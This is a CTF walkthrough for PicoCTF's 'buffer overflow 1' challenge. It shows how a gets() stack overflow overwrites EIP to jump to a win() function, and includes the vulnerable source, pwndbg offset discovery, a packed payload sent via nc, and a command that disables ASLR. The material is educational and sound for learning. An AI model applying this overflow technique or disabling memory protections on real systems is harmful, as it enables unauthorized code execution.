PicoCTF - Binary Exploitation 1

How to exploit a binary by overwriting the instruction pointer

Introduction

This post walks through the steps to complete a basic capture the flag challenge hosted at PicoCTF. The challenge is named 'buffer overflow 1' and is of medium difficulty.


First steps

Once the binary and source code have been downloaded, we first need to understand how the program works. We give the binary executable permissions and then run it:

chmod u+x vuln

Executing the program outputs this:

$ ./vuln
Please enter your string:

We provide the prompt some input:

$ ./vuln
Please enter your string:
hello friend

Okay, time to return... Fingers Crossed... Jumping to 0x804932f

This looks like a memory address. Interesting. We'll keep this in mind.


Moving on

Now we need to take a look at the file's metadata. We can do this using file and checksec.

vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=685b06b911b19065f27c2d369c18ed09fbadb543, for GNU/Linux 3.2.0, not stripped

Here we can see that it is a 32-bit binary that's dynamically linked. Most importantly for us, it is not stripped, meaning we can see the symbols (the names of functions, for example).
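To see where file gets this information from, here is a minimal sketch that decodes a few fields of an ELF header using only the Python standard library. The function name describe_elf_header and the sample bytes are my own illustration (the sample is hand-built to match the file output above, not read from the real binary), and only a handful of field values are mapped.

```python
import struct

def describe_elf_header(header: bytes) -> dict:
    """Decode a few identifying fields from the first 20 bytes of an ELF file."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # Byte 4 (EI_CLASS) is the word size, byte 5 (EI_DATA) is the byte order.
    ei_class = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown")
    ei_data = {1: "LSB", 2: "MSB"}.get(header[5], "unknown")
    byte_order = "<" if header[5] == 1 else ">"
    # e_type and e_machine are two 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from(byte_order + "HH", header, 16)
    return {
        "class": ei_class,
        "data": ei_data,
        "type": {2: "executable", 3: "shared object / PIE"}.get(e_type, hex(e_type)),
        "machine": {3: "Intel i386", 62: "x86-64"}.get(e_machine, hex(e_machine)),
    }

# Hand-built header (illustrative): 32-bit, little-endian, ET_EXEC, EM_386.
sample = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 3)
print(describe_elf_header(sample))
```

To try it on the real binary, pass in the first 20 bytes of the file, for example describe_elf_header(open("vuln", "rb").read(20)).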

For checksec, I have set the output format to CSV so it's easier to read.

Partial RELRO, No Canary found, NX disabled, No PIE

Great! It seems the binary is not shielded by any protections. Here's what some of these protections do:

  • Stack Canaries: These values, or 'canaries', are used to detect buffer overflows. Simply put, a canary is placed on the stack between local buffers and important data like the saved return address. If an overflowing buffer overwrites the canary, the program halts execution before the function returns, stopping any malicious activity from occurring.

  • NX: The No-Execute bit marks important areas of memory (like the stack) as non-executable, which ensures that injected code or shellcode doesn't run.

  • PIE: A Position Independent Executable can be loaded at a different base address every time the binary is executed. The offsets between functions inside the binary stay the same, but the changing base makes it harder to hardcode memory addresses in exploit scripts.

Note that the address randomization PIE relies on (ASLR) can be turned off on Linux systems via this command:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Don't turn this off on your main system. If you want to test it, use a virtual machine.
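If you only want to check the current setting rather than change it, the same file can be read without root. This is a small sketch; the helper names describe_aslr and read_aslr are made up for illustration, and the descriptions are my own summary of the three values the kernel accepts.

```python
from pathlib import Path

# Meaning of each value of /proc/sys/kernel/randomize_va_space (summarised).
ASLR_MODES = {
    0: "disabled",
    1: "partial: stack, mmap regions and shared libraries are randomized",
    2: "full: as mode 1, plus the heap (brk) is randomized",
}

def describe_aslr(raw: str) -> str:
    """Translate the raw file contents (e.g. '2\\n') into a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown mode")

def read_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the live setting; only works on a Linux system."""
    return describe_aslr(Path(path).read_text())

print(describe_aslr("2\n"))
```

On a Linux machine, print(read_aslr()) reports the live value.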


Back to it

So we know the binary can be easily exploited because of the lack of defensive systems. Let's take a look at the source code and see what this program does:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

We can see that there are three functions. Two things should be jumping out at you. Firstly, gets is being used to read input. This is great for us, but not for security. Never use gets. It doesn't check whether the input exceeds the allocated buffer. This means input larger than the buffer can overwrite other important data on the stack, including the saved return address, which is loaded into the instruction pointer when the function returns. So?

If we can control the instruction pointer (EIP on 32-bit x86), we can control the program and tell it where to go and what to execute next.

Secondly, there is a win() function that is never called by either main() or vuln(), yet it is the function that prints the flag, so we need to call it ourselves. We now know how to exploit this program.
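To make the danger of gets concrete, here is a toy simulation in Python. It is a sketch under a simplifying assumption: the 32-byte buffer is followed immediately by a 4-byte saved return address, whereas the real stack frame has a few more bytes in between. The function names are hypothetical, and 0x0804932f is the address the program printed during the normal run earlier.

```python
import struct

BUFSIZE = 32  # same constant as the challenge source

def new_frame() -> bytearray:
    # Toy layout (an assumption): buffer, then a 4-byte saved return address.
    return bytearray(BUFSIZE) + struct.pack("<I", 0x0804932F)

def saved_return(frame: bytearray) -> int:
    """Read back the 4 bytes that sit right after the buffer."""
    return struct.unpack_from("<I", frame, BUFSIZE)[0]

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic gets(): copy every input byte, ignoring BUFSIZE."""
    frame[0:len(data)] = data

def bounded_copy(frame: bytearray, data: bytes) -> None:
    """Mimic fgets(buf, BUFSIZE, stdin): keep at most BUFSIZE - 1 bytes plus a NUL."""
    kept = data[:BUFSIZE - 1] + b"\x00"
    frame[0:len(kept)] = kept

# 32 filler bytes, then 4 bytes that land on the saved return address.
attack = b"A" * BUFSIZE + struct.pack("<I", 0xDEADBEEF)

frame = new_frame()
unchecked_copy(frame, attack)
print(hex(saved_return(frame)))  # 0xdeadbeef: the return address was replaced

frame = new_frame()
bounded_copy(frame, attack)
print(hex(saved_return(frame)))  # 0x804932f: the return address survived
```

The bounded copy is roughly what replacing gets with fgets would achieve: the extra bytes are dropped before they can reach the return address.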


Exploitation

To exploit this binary, we first need to know how many characters it takes to reach the EIP. We can do this using gdb. I'll be using pwndbg, which comes with some extra features like cyclic, which is quite handy, as we'll see.

Step 1 Let's load the program in pwndbg and see how many characters it takes to overwrite the EIP. We can create a pattern of characters, which will help us identify the offset. We know the buffer length is 32 from the BUFSIZE constant in the source code, so the pattern needs to be longer than that. Let's create a cyclic pattern of 50 characters:

pwndbg> cyclic 50
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
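The pattern works because every 4-character window in it is unique, so any 4 bytes that end up in a register identify exactly one position. A sequence with that property is called a de Bruijn sequence. The sketch below is a standard-library generator for one, written for illustration (the function name de_bruijn is mine, and I am not claiming this is pwndbg's exact code); over the lowercase alphabet with windows of 4 it reproduces the 50 characters shown above.

```python
from itertools import islice
import string

def de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence: every length-n window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            # Emit the current word only if its period divides n.
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

# Take the first 50 characters, like `cyclic 50`.
pattern = "".join(islice(de_bruijn(string.ascii_lowercase, 4), 50))
print(pattern)
```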

Step 2 Let's run the program and use this as input. We should get a segmentation fault, but we should also get some very useful information.

pwndbg> r
Starting program: /home/kali/Downloads/re/bufferoverflow1/vuln 
warning: Unable to find libthread_db matching inferior's thread library, thread debugging will not be available.
Please enter your string: 
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Okay, time to return... Fingers Crossed... Jumping to 0x6161616c

Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP |

As expected, we received a segmentation fault. Let's take a look at the EIP.

 EAX  0x41
 EBX  0x6161616a ('jaaa')
 ECX  0
 EDX  0
 EDI  0xf7ffcb60 (_rtld_global_ro) ◂— 0
 ESI  0x8049350 (__libc_csu_init) ◂— endbr32 
 EBP  0x6161616b ('kaaa')
 ESP  0xffffd240 ◂— 0xf700616d /* 'ma' */
 EIP  0x6161616c ('laaa')
──────────────────────────

Great! As we can see, our input made its way into the EIP, overwriting it with our data. We need to find how many characters it took to get there. Luckily, pwndbg has a handy built-in for this.

pwndbg> cyclic -l laaa
Finding cyclic pattern of 4 bytes: b'laaa' (hex: 0x6c616161)
Found at offset 44

Using cyclic -l we can look up the pattern. We see our offset is 44, meaning 44 bytes of padding come before the bytes that land in the EIP.
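The lookup itself is simple enough to reproduce by hand. As a rough sketch (the helper name offset_of is my own), we can pack each register value from the crash back into little-endian bytes and search for it in the pattern we sent. Doing this for EBX and EBP as well shows which parts of the input landed in the saved registers just before the return address.

```python
import struct

# The exact pattern that was fed to the program.
pattern = b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama"

def offset_of(register_value: int) -> int:
    """Return where a 32-bit register value appears in the pattern, or -1."""
    # Registers show the bytes as a little-endian integer, so pack them back.
    needle = struct.pack("<I", register_value)
    return pattern.find(needle)

# Register values taken from the crash dump above.
for name, value in [("EBX", 0x6161616A), ("EBP", 0x6161616B), ("EIP", 0x6161616C)]:
    print(name, offset_of(value))
# EBX 36
# EBP 40
# EIP 44
```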

Step 3 Now we need to find the memory address of the win() function. Why? So we can point the EIP at this function when we overflow the return address with our data. We can find the memory address like this:

pwndbg> disas win
Dump of assembler code for function win:
   0x080491f6 <+0>:     endbr32
   0x080491fa <+4>:     push   ebp
   0x080491fb <+5>:     mov    ebp,esp
   0x080491fd <+7>:     push   ebx
   0x080491fe <+8>:     sub    esp,0x54
   0x08049201 <+11>:    call   0x8049130 <__x86.get_pc_thunk.bx>

Using disas win, we can disassemble the function into its assembly equivalent. We see now why having the symbols and the memory addresses makes our lives so much easier. I haven't shown the entirety of the win() function, as we only need the first line, particularly, the memory address: 0x080491f6

Step 4 We now have the offset and the memory address. We just need to put it all together. However, we first need to ensure the program can read the memory address properly. To do so, we must convert it to little-endian format (least significant byte first), which is the byte order x86 processors use. Thankfully, pwntools has a handy function for this in Python:

>>> import pwn
>>> print(pwn.p32(0x080491f6))
b'\xf6\x91\x04\x08'

Here, we have our bytes! b'\xf6\x91\x04\x08'
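If pwntools isn't installed, the same conversion can be sketched with Python's built-in struct module. This is an equivalent for this one case, not a replacement for pwntools; "<I" means a little-endian unsigned 32-bit integer, and the big-endian version is shown only for contrast.

```python
import struct

WIN_ADDR = 0x080491F6  # address of win() from the disassembly

little = struct.pack("<I", WIN_ADDR)  # least significant byte first
big = struct.pack(">I", WIN_ADDR)     # most significant byte first

print(little)  # b'\xf6\x91\x04\x08'
print(big)     # b'\x08\x04\x91\xf6'

# Round trip: reading the bytes back as little-endian gives the address again.
print(hex(int.from_bytes(little, "little")))  # 0x80491f6
```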

Step 5 Now all we need to do is send this data as input to the PicoCTF server. However, we first need to prepend 44 bytes of padding so the address lands at the right offset.

>>> offset=44
>>> print(b"A" * offset + b'\xf6\x91\x04\x08')
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08'

We don't actually need the b at the start when typing this into a shell (it just marks a bytes literal in Python). Using the server and port provided by PicoCTF, we can simply send the payload via nc. The -e flag tells echo to turn the \x escapes into raw bytes:

➜ echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08' | nc saturn.picoctf.net 55210 
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_REDACTED}                      

And you should get your flag!
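The same delivery can be scripted in Python, which avoids any shell quoting surprises. Below is a minimal sketch using only the standard library; build_payload and send_payload are names I made up, and the host and port you pass in must be the ones PicoCTF gives you for your own instance.

```python
import socket
import struct

OFFSET = 44            # padding needed to reach the return address
WIN_ADDR = 0x080491F6  # address of win()

def build_payload(offset: int = OFFSET, target: int = WIN_ADDR) -> bytes:
    """Padding, then the little-endian target address, then a newline for gets."""
    return b"A" * offset + struct.pack("<I", target) + b"\n"

def send_payload(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Connect, send the payload, and return everything the server prints."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(build_payload())
        while True:
            try:
                data = conn.recv(4096)
            except socket.timeout:
                break  # server went quiet
            if not data:
                break  # server closed the connection
            chunks.append(data)
    return b"".join(chunks)

# Only build and show the payload here; nothing is sent over the network.
print(build_payload())
```

Calling print(send_payload("saturn.picoctf.net", 55210).decode(errors="replace")) with your instance's port should show the same output as the nc command.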


Conclusion

This challenge was fairly simple, but it teaches you what certain binary protections do, and how controlling the instruction pointer gives us control over what the program executes next.
